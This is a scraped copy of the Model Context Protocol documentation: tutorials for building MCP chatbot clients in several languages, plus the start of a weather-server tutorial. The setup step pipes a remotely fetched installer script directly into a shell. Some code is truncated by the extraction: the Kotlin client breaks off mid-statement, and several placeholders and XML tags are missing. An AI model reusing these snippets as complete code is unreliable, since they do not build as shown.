# Build an MCP client
Source: https://modelcontextprotocol.io/docs/develop/build-client
Get started building your own client that can integrate with all MCP servers.
In this tutorial, you'll learn how to build an LLM-powered chatbot client that connects to MCP servers.
Before you begin, it helps to have gone through our [Build an MCP Server](/docs/develop/build-server) tutorial so you can understand how clients and servers communicate.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-python)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Latest Python version installed
* Latest version of `uv` installed
## Setting Up Your Environment
First, create a new Python project with `uv`:
```bash macOS/Linux theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
source .venv/bin/activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
rm main.py
# Create our main file
touch client.py
```
```powershell Windows theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
.venv\Scripts\activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
del main.py
# Create our main file
new-item client.py
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=your-api-key-goes-here" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class:
```python theme={null}
import asyncio
from typing import Optional
from contextlib import AsyncExitStack
from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client
from anthropic import Anthropic
from dotenv import load_dotenv
load_dotenv() # load environment variables from .env
class MCPClient:
def __init__(self):
# Initialize session and client objects
self.session: Optional[ClientSession] = None
self.exit_stack = AsyncExitStack()
self.anthropic = Anthropic()
# methods will go here
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```python theme={null}
async def connect_to_server(self, server_script_path: str):
"""Connect to an MCP server
Args:
server_script_path: Path to the server script (.py or .js)
"""
is_python = server_script_path.endswith('.py')
is_js = server_script_path.endswith('.js')
if not (is_python or is_js):
raise ValueError("Server script must be a .py or .js file")
command = "python" if is_python else "node"
server_params = StdioServerParameters(
command=command,
args=[server_script_path],
env=None
)
stdio_transport = await self.exit_stack.enter_async_context(stdio_client(server_params))
self.stdio, self.write = stdio_transport
self.session = await self.exit_stack.enter_async_context(ClientSession(self.stdio, self.write))
await self.session.initialize()
# List available tools
response = await self.session.list_tools()
tools = response.tools
print("\nConnected to server with tools:", [tool.name for tool in tools])
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```python theme={null}
async def process_query(self, query: str) -> str:
"""Process a query using Claude and available tools"""
messages = [
{
"role": "user",
"content": query
}
]
response = await self.session.list_tools()
available_tools = [{
"name": tool.name,
"description": tool.description,
"input_schema": tool.inputSchema
} for tool in response.tools]
# Initial Claude API call
response = self.anthropic.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1000,
messages=messages,
tools=available_tools
)
# Process response and handle tool calls
final_text = []
assistant_message_content = []
for content in response.content:
if content.type == 'text':
final_text.append(content.text)
assistant_message_content.append(content)
elif content.type == 'tool_use':
tool_name = content.name
tool_args = content.input
# Execute tool call
result = await self.session.call_tool(tool_name, tool_args)
final_text.append(f"[Calling tool {tool_name} with args {tool_args}]")
assistant_message_content.append(content)
messages.append({
"role": "assistant",
"content": assistant_message_content
})
messages.append({
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": content.id,
"content": result.content
}
]
})
# Get next response from Claude
response = self.anthropic.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1000,
messages=messages,
tools=available_tools
)
final_text.append(response.content[0].text)
return "\n".join(final_text)
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```python theme={null}
async def chat_loop(self):
"""Run an interactive chat loop"""
print("\nMCP Client Started!")
print("Type your queries or 'quit' to exit.")
while True:
try:
query = input("\nQuery: ").strip()
if query.lower() == 'quit':
break
response = await self.process_query(query)
print("\n" + response)
except Exception as e:
print(f"\nError: {str(e)}")
async def cleanup(self):
"""Clean up resources"""
await self.exit_stack.aclose()
```
### Main Entry Point
Finally, we'll add the main execution logic:
```python theme={null}
async def main():
if len(sys.argv) < 2:
print("Usage: python client.py ")
sys.exit(1)
client = MCPClient()
try:
await client.connect_to_server(sys.argv[1])
await client.chat_loop()
finally:
await client.cleanup()
if __name__ == "__main__":
import sys
asyncio.run(main())
```
You can find the complete `client.py` file [here](https://github.com/modelcontextprotocol/quickstart-resources/blob/main/mcp-client-python/client.py).
## Key Components Explained
### 1. Client Initialization
* The `MCPClient` class initializes with session management and API clients
* Uses `AsyncExitStack` for proper resource management
* Configures the Anthropic client for Claude interactions
### 2. Server Connection
* Supports both Python and Node.js servers
* Validates server script type
* Sets up proper communication channels
* Initializes the session and lists available tools
### 3. Query Processing
* Maintains conversation context
* Handles Claude's responses and tool calls
* Manages the message flow between Claude and tools
* Combines results into a coherent response
### 4. Interactive Interface
* Provides a simple command-line interface
* Handles user input and displays responses
* Includes basic error handling
* Allows graceful exit
### 5. Resource Management
* Proper cleanup of resources
* Error handling for connection issues
* Graceful shutdown procedures
## Common Customization Points
1. **Tool Handling**
* Modify `process_query()` to handle specific tool types
* Add custom error handling for tool calls
* Implement tool-specific response formatting
2. **Response Processing**
* Customize how tool results are formatted
* Add response filtering or transformation
* Implement custom logging
3. **User Interface**
* Add a GUI or web interface
* Implement rich console output
* Add command history or auto-completion
## Running the Client
To run your client with any MCP server:
```bash theme={null}
uv run client.py path/to/server.py # python server
uv run client.py path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python), your command might look something like this: `python client.py .../quickstart-resources/weather-server-python/weather.py`
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
Here's an example of what it should look like if connected to the weather server from the server quickstart:
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
## Best practices
1. **Error Handling**
* Always wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Resource Management**
* Use `AsyncExitStack` for proper cleanup
* Close connections when done
* Handle server disconnections
3. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
4. **Tool Names**
* Tool names can be validated according to the format specified [here](/specification/draft/server/tools#tool-names)
* If a tool name conforms to the specified format, it should not fail validation by an MCP client
## Troubleshooting
### Server Path Issues
* Double-check the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.py for Python or .js for Node.js)
Example of correct path usage:
```bash theme={null}
# Relative path
uv run client.py ./server/weather.py
# Absolute path
uv run client.py /Users/username/projects/mcp-server/weather.py
# Windows path (either format works)
uv run client.py C:/projects/mcp-server/weather.py
uv run client.py C:\\projects\\mcp-server\\weather.py
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `FileNotFoundError`: Check your server path
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `Timeout error`: Consider increasing the timeout in your client configuration
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-typescript)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Node.js 17 or higher installed
* Latest version of `npm` installed
* Anthropic API key (Claude)
## Setting Up Your Environment
First, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create project directory
mkdir mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
touch index.ts
```
```powershell Windows theme={null}
# Create project directory
md mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
new-item index.ts
```
Update your `package.json` to set `type: "module"` and a build script:
```json package.json theme={null}
{
"type": "module",
"scripts": {
"build": "tsc && chmod 755 build/index.js"
}
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "Node16",
"moduleResolution": "Node16",
"outDir": "./build",
"rootDir": "./",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"forceConsistentCasingInFileNames": true
},
"include": ["index.ts"],
"exclude": ["node_modules"]
}
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class in `index.ts`:
```typescript theme={null}
import { Anthropic } from "@anthropic-ai/sdk";
import {
MessageParam,
Tool,
} from "@anthropic-ai/sdk/resources/messages/messages.mjs";
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
import readline from "readline/promises";
import dotenv from "dotenv";
dotenv.config();
const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
if (!ANTHROPIC_API_KEY) {
throw new Error("ANTHROPIC_API_KEY is not set");
}
class MCPClient {
private mcp: Client;
private anthropic: Anthropic;
private transport: StdioClientTransport | null = null;
private tools: Tool[] = [];
constructor() {
this.anthropic = new Anthropic({
apiKey: ANTHROPIC_API_KEY,
});
this.mcp = new Client({ name: "mcp-client-cli", version: "1.0.0" });
}
// methods will go here
}
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```typescript theme={null}
async connectToServer(serverScriptPath: string) {
try {
const isJs = serverScriptPath.endsWith(".js");
const isPy = serverScriptPath.endsWith(".py");
if (!isJs && !isPy) {
throw new Error("Server script must be a .js or .py file");
}
const command = isPy
? process.platform === "win32"
? "python"
: "python3"
: process.execPath;
this.transport = new StdioClientTransport({
command,
args: [serverScriptPath],
});
await this.mcp.connect(this.transport);
const toolsResult = await this.mcp.listTools();
this.tools = toolsResult.tools.map((tool) => {
return {
name: tool.name,
description: tool.description,
input_schema: tool.inputSchema,
};
});
console.log(
"Connected to server with tools:",
this.tools.map(({ name }) => name)
);
} catch (e) {
console.log("Failed to connect to MCP server: ", e);
throw e;
}
}
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```typescript theme={null}
async processQuery(query: string) {
const messages: MessageParam[] = [
{
role: "user",
content: query,
},
];
const response = await this.anthropic.messages.create({
model: "claude-sonnet-4-20250514",
max_tokens: 1000,
messages,
tools: this.tools,
});
const finalText = [];
for (const content of response.content) {
if (content.type === "text") {
finalText.push(content.text);
} else if (content.type === "tool_use") {
const toolName = content.name;
const toolArgs = content.input as { [x: string]: unknown } | undefined;
const result = await this.mcp.callTool({
name: toolName,
arguments: toolArgs,
});
finalText.push(
`[Calling tool ${toolName} with args ${JSON.stringify(toolArgs)}]`
);
messages.push({
role: "user",
content: result.content as string,
});
const response = await this.anthropic.messages.create({
model: "claude-sonnet-4-20250514",
max_tokens: 1000,
messages,
});
finalText.push(
response.content[0].type === "text" ? response.content[0].text : ""
);
}
}
return finalText.join("\n");
}
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```typescript theme={null}
async chatLoop() {
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
});
try {
console.log("\nMCP Client Started!");
console.log("Type your queries or 'quit' to exit.");
while (true) {
const message = await rl.question("\nQuery: ");
if (message.toLowerCase() === "quit") {
break;
}
const response = await this.processQuery(message);
console.log("\n" + response);
}
} finally {
rl.close();
}
}
async cleanup() {
await this.mcp.close();
}
```
### Main Entry Point
Finally, we'll add the main execution logic:
```typescript theme={null}
async function main() {
if (process.argv.length < 3) {
console.log("Usage: node index.ts ");
return;
}
const mcpClient = new MCPClient();
try {
await mcpClient.connectToServer(process.argv[2]);
await mcpClient.chatLoop();
} catch (e) {
console.error("Error:", e);
await mcpClient.cleanup();
process.exit(1);
} finally {
await mcpClient.cleanup();
process.exit(0);
}
}
main();
```
## Running the Client
To run your client with any MCP server:
```bash theme={null}
# Build TypeScript
npm run build
# Run the client
node build/index.js path/to/server.py # python server
node build/index.js path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript), your command might look something like this: `node build/index.js .../quickstart-resources/weather-server-typescript/build/index.js`
**The client will:**
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
## Best practices
1. **Error Handling**
* Use TypeScript's type system for better error detection
* Wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
## Troubleshooting
### Server Path Issues
* Double-check the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.js for Node.js or .py for Python)
Example of correct path usage:
```bash theme={null}
# Relative path
node build/index.js ./server/build/index.js
# Absolute path
node build/index.js /Users/username/projects/mcp-server/build/index.js
# Windows path (either format works)
node build/index.js C:/projects/mcp-server/build/index.js
node build/index.js C:\\projects\\mcp-server\\build\\index.js
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `Error: Cannot find module`: Check your build folder and ensure TypeScript compilation succeeded
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `ANTHROPIC_API_KEY is not set`: Check your .env file and environment variables
* `TypeError`: Ensure you're using the correct types for tool arguments
* `BadRequestError`: Ensure you have enough credits to access the Anthropic API
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP Clients manually, consult the [Java SDK Client](/sdk/java/mcp-client) documentation
This example demonstrates how to build an interactive chatbot that combines Spring AI's Model Context Protocol (MCP) with the [Brave Search MCP Server](https://github.com/modelcontextprotocol/servers-archived/tree/main/src/brave-search). The application creates a conversational interface powered by Anthropic's Claude AI model that can perform internet searches through Brave Search, enabling natural language interactions with real-time web data.
[You can find the complete code for this tutorial here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/web-search/brave-chatbot)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Maven 3.6+
* npx package manager
* Anthropic API key (Claude)
* Brave Search API key
## Setting Up Your Environment
1. Install npx (Node Package eXecute):
First, make sure to install [npm](https://docs.npmjs.com/downloading-and-installing-node-js-and-npm)
and then run:
```bash theme={null}
npm install -g npx
```
2. Clone the repository:
```bash theme={null}
git clone https://github.com/spring-projects/spring-ai-examples.git
cd model-context-protocol/web-search/brave-chatbot
```
3. Set up your API keys:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
export BRAVE_API_KEY='your-brave-api-key-here'
```
4. Build the application:
```bash theme={null}
./mvnw clean install
```
5. Run the application using Maven:
```bash theme={null}
./mvnw spring-boot:run
```
Make sure you keep your `ANTHROPIC_API_KEY` and `BRAVE_API_KEY` keys secure!
## How it Works
The application integrates Spring AI with the Brave Search MCP server through several components:
### MCP Client Configuration
1. Required dependencies in pom.xml:
```xml theme={null}
org.springframework.aispring-ai-starter-mcp-clientorg.springframework.aispring-ai-starter-model-anthropic
```
2. Application properties (application.yml):
```yml theme={null}
spring:
ai:
mcp:
client:
enabled: true
name: brave-search-client
version: 1.0.0
type: SYNC
request-timeout: 20s
stdio:
root-change-notification: true
servers-configuration: classpath:/mcp-servers-config.json
toolcallback:
enabled: true
anthropic:
api-key: ${ANTHROPIC_API_KEY}
```
This activates the `spring-ai-starter-mcp-client` to create one or more `McpClient`s based on the provided server configuration.
The `spring.ai.mcp.client.toolcallback.enabled=true` property enables the tool callback mechanism, that automatically registers all MCP tool as spring ai tools.
It is disabled by default.
3. MCP Server Configuration (`mcp-servers-config.json`):
```json theme={null}
{
"mcpServers": {
"brave-search": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-brave-search"],
"env": {
"BRAVE_API_KEY": ""
}
}
}
}
```
### Chat Implementation
The chatbot is implemented using Spring AI's ChatClient with MCP tool integration:
```java theme={null}
var chatClient = chatClientBuilder
.defaultSystem("You are useful assistant, expert in AI and Java.")
.defaultToolCallbacks((Object[]) mcpToolAdapter.toolCallbacks())
.defaultAdvisors(new MessageChatMemoryAdvisor(new InMemoryChatMemory()))
.build();
```
Key features:
* Uses Claude AI model for natural language understanding
* Integrates Brave Search through MCP for real-time web search capabilities
* Maintains conversation memory using InMemoryChatMemory
* Runs as an interactive command-line application
### Build and run
```bash theme={null}
./mvnw clean install
java -jar ./target/ai-mcp-brave-chatbot-0.0.1-SNAPSHOT.jar
```
or
```bash theme={null}
./mvnw spring-boot:run
```
The application will start an interactive chat session where you can ask questions. The chatbot will use Brave Search when it needs to find information from the internet to answer your queries.
The chatbot can:
* Answer questions using its built-in knowledge
* Perform web searches when needed using Brave Search
* Remember context from previous messages in the conversation
* Combine information from multiple sources to provide comprehensive answers
### Advanced Configuration
The MCP client supports additional configuration options:
* Client customization through `McpSyncClientCustomizer` or `McpAsyncClientCustomizer`
* Multiple clients with multiple transport types: `STDIO` and `SSE` (Server-Sent Events)
* Integration with Spring AI's tool execution framework
* Automatic client initialization and lifecycle management
For WebFlux-based applications, you can use the WebFlux starter instead:
```xml theme={null}
org.springframework.aispring-ai-mcp-client-webflux-spring-boot-starter
```
This provides similar functionality but uses a WebFlux-based SSE transport implementation, recommended for production deployments.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/kotlin-mcp-client)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Anthropic API key (Claude)
## Setting up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val anthropicVersion = "0.8.0"
dependencies {
implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
implementation("org.slf4j:slf4j-nop:$slf4jVersion")
implementation("com.anthropic:anthropic-java:$anthropicVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.3.0'
def slf4jVersion = '2.0.9'
def anthropicVersion = '0.8.0'
dependencies {
implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
implementation "org.slf4j:slf4j-nop:$slf4jVersion"
implementation "com.anthropic:anthropic-java:$anthropicVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
id 'com.gradleup.shadow' version '8.3.9'
}
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Set up your API key:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
```
Make sure your keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's create the basic client class:
```kotlin theme={null}
class MCPClient : AutoCloseable {
private val anthropic = AnthropicOkHttpClient.fromEnv()
private val mcp: Client = Client(clientInfo = Implementation(name = "mcp-client-cli", version = "1.0.0"))
private lateinit var tools: List
// methods will go here
override fun close() {
runBlocking {
mcp.close()
anthropic.close()
}
}
```
### Server connection management
Next, we'll implement the method to connect to an MCP server:
```kotlin theme={null}
suspend fun connectToServer(serverScriptPath: String) {
try {
val command = buildList {
when (serverScriptPath.substringAfterLast(".")) {
"js" -> add("node")
"py" -> add(if (System.getProperty("os.name").lowercase().contains("win")) "python" else "python3")
"jar" -> addAll(listOf("java", "-jar"))
else -> throw IllegalArgumentException("Server script must be a .js, .py or .jar file")
}
add(serverScriptPath)
}
val process = ProcessBuilder(command).start()
val transport = StdioClientTransport(
input = process.inputStream.asSource().buffered(),
output = process.outputStream.asSink().buffered()
)
mcp.connect(transport)
val toolsResult = mcp.listTools()
tools = toolsResult?.tools?.map { tool ->
ToolUnion.ofTool(
Tool.builder()
.name(tool.name)
.description(tool.description ?: "")
.inputSchema(
Tool.InputSchema.builder()
.type(JsonValue.from(tool.inputSchema.type))
.properties(tool.inputSchema.properties.toJsonValue())
.putAdditionalProperty("required", JsonValue.from(tool.inputSchema.required))
.build()
)
.build()
)
} ?: emptyList()
println("Connected to server with tools: ${tools.joinToString(", ") { it.tool().get().name() }}")
} catch (e: Exception) {
println("Failed to connect to MCP server: $e")
throw e
}
}
```
Also create a helper function to convert from `JsonObject` to `JsonValue` for Anthropic:
```kotlin theme={null}
private fun JsonObject.toJsonValue(): JsonValue {
val mapper = ObjectMapper()
val node = mapper.readTree(this.toString())
return JsonValue.fromJsonNode(node)
}
```
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```kotlin theme={null}
private val messageParamsBuilder: MessageCreateParams.Builder = MessageCreateParams.builder()
.model(Model.CLAUDE_SONNET_4_20250514)
.maxTokens(1024)
suspend fun processQuery(query: String): String {
val messages = mutableListOf(
MessageParam.builder()
.role(MessageParam.Role.USER)
.content(query)
.build()
)
val response = anthropic.messages().create(
messageParamsBuilder
.messages(messages)
.tools(tools)
.build()
)
val finalText = mutableListOf()
response.content().forEach { content ->
when {
content.isText() -> finalText.add(content.text().getOrNull()?.text() ?: "")
content.isToolUse() -> {
val toolName = content.toolUse().get().name()
val toolArgs =
content.toolUse().get()._input().convert(object : TypeReference
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartClient)
## System Requirements
Before starting, ensure your system meets these requirements:
* .NET 8.0 or higher
* Anthropic API key (Claude)
* Windows, Linux, or macOS
## Setting up your environment
First, create a new .NET project:
```bash theme={null}
dotnet new console -n QuickstartClient
cd QuickstartClient
```
Then, add the required dependencies to your project:
```bash theme={null}
dotnet add package ModelContextProtocol --prerelease
dotnet add package Anthropic.SDK
dotnet add package Microsoft.Extensions.Hosting
dotnet add package Microsoft.Extensions.AI
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
```bash theme={null}
dotnet user-secrets init
dotnet user-secrets set "ANTHROPIC_API_KEY" ""
```
## Creating the Client
### Basic Client Structure
First, let's setup the basic client class in the file `Program.cs`:
```csharp theme={null}
using Anthropic.SDK;
using Microsoft.Extensions.AI;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol.Client;
using ModelContextProtocol.Protocol.Transport;
var builder = Host.CreateApplicationBuilder(args);
builder.Configuration
.AddEnvironmentVariables()
.AddUserSecrets();
```
This creates the beginnings of a .NET console application that can read the API key from user secrets.
Next, we'll setup the MCP Client:
```csharp theme={null}
var (command, arguments) = GetCommandAndArguments(args);
var clientTransport = new StdioClientTransport(new()
{
Name = "Demo Server",
Command = command,
Arguments = arguments,
});
await using var mcpClient = await McpClient.CreateAsync(clientTransport);
var tools = await mcpClient.ListToolsAsync();
foreach (var tool in tools)
{
Console.WriteLine($"Connected to server with tools: {tool.Name}");
}
```
Add this function at the end of the `Program.cs` file:
```csharp theme={null}
static (string command, string[] arguments) GetCommandAndArguments(string[] args)
{
return args switch
{
[var script] when script.EndsWith(".py") => ("python", args),
[var script] when script.EndsWith(".js") => ("node", args),
[var script] when Directory.Exists(script) || (File.Exists(script) && script.EndsWith(".csproj")) => ("dotnet", ["run", "--project", script, "--no-build"]),
_ => throw new NotSupportedException("An unsupported server script was provided. Supported scripts are .py, .js, or .csproj")
};
}
```
This creates an MCP client that will connect to a server that is provided as a command line argument. It then lists the available tools from the connected server.
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```csharp theme={null}
using var anthropicClient = new AnthropicClient(new APIAuthentication(builder.Configuration["ANTHROPIC_API_KEY"]))
.Messages
.AsBuilder()
.UseFunctionInvocation()
.Build();
var options = new ChatOptions
{
MaxOutputTokens = 1000,
ModelId = "claude-sonnet-4-20250514",
Tools = [.. tools]
};
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("MCP Client Started!");
Console.ResetColor();
PromptForInput();
while(Console.ReadLine() is string query && !"exit".Equals(query, StringComparison.OrdinalIgnoreCase))
{
if (string.IsNullOrWhiteSpace(query))
{
PromptForInput();
continue;
}
await foreach (var message in anthropicClient.GetStreamingResponseAsync(query, options))
{
Console.Write(message);
}
Console.WriteLine();
PromptForInput();
}
static void PromptForInput()
{
Console.WriteLine("Enter a command (or 'exit' to quit):");
Console.ForegroundColor = ConsoleColor.Cyan;
Console.Write("> ");
Console.ResetColor();
}
```
## Key Components Explained
### 1. Client Initialization
* The client is initialized using `McpClient.CreateAsync()`, which sets up the transport type and command to run the server.
### 2. Server Connection
* Supports Python, Node.js, and .NET servers.
* The server is started using the command specified in the arguments.
* Configures to use stdio for communication with the server.
* Initializes the session and available tools.
### 3. Query Processing
* Leverages [Microsoft.Extensions.AI](https://learn.microsoft.com/dotnet/ai/ai-extensions) for the chat client.
* Configures the `IChatClient` to use automatic tool (function) invocation.
* The client reads user input and sends it to the server.
* The server processes the query and returns a response.
* The response is displayed to the user.
## Running the Client
To run your client with any MCP server:
```bash theme={null}
dotnet run -- path/to/server.csproj # dotnet server
dotnet run -- path/to/server.py # python server
dotnet run -- path/to/server.js # node server
```
If you're continuing the weather tutorial from the server quickstart, your command might look something like this: `dotnet run -- path/to/QuickstartWeatherServer`.
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
4. Exit the session when done
Here's an example of what it should look like it connected to a weather server quickstart:
## Next steps
Check out our gallery of official MCP servers and implementations
View the list of clients that support MCP integrations
# Build an MCP server
Source: https://modelcontextprotocol.io/docs/develop/build-server
Get started building your own server to use in Claude for Desktop and other clients.
In this tutorial, we'll build a simple MCP weather server and connect it to a host, Claude for Desktop.
### What we'll be building
We'll build a server that exposes two tools: `get_alerts` and `get_forecast`. Then we'll connect the server to an MCP host (in this case, Claude for Desktop):
Servers can connect to any client. We've chosen Claude for Desktop here for simplicity, but we also have guides on [building your own client](/docs/develop/build-client) as well as a [list of other clients here](/clients).
### Core MCP Concepts
MCP servers can provide three main types of capabilities:
1. **[Resources](/docs/learn/server-concepts#resources)**: File-like data that can be read by clients (like API responses or file contents)
2. **[Tools](/docs/learn/server-concepts#tools)**: Functions that can be called by the LLM (with user approval)
3. **[Prompts](/docs/learn/server-concepts#prompts)**: Pre-written templates that help users accomplish specific tasks
This tutorial will primarily focus on tools.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Python
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. For Python, be especially careful - `print()` writes to stdout by default.
### Quick Examples
```python theme={null}
# ❌ Bad (STDIO)
print("Processing request")
# ✅ Good (STDIO)
import logging
logging.info("Processing request")
```
### System requirements
* Python 3.10 or higher installed.
* You must use the Python MCP SDK 1.2.0 or higher.
### Set up your environment
First, let's install `uv` and set up our Python project and environment:
```bash macOS/Linux theme={null}
curl -LsSf https://astral.sh/uv/install.sh | sh
```
```powershell Windows theme={null}
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
```
Make sure to restart your terminal afterwards to ensure that the `uv` command gets picked up.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
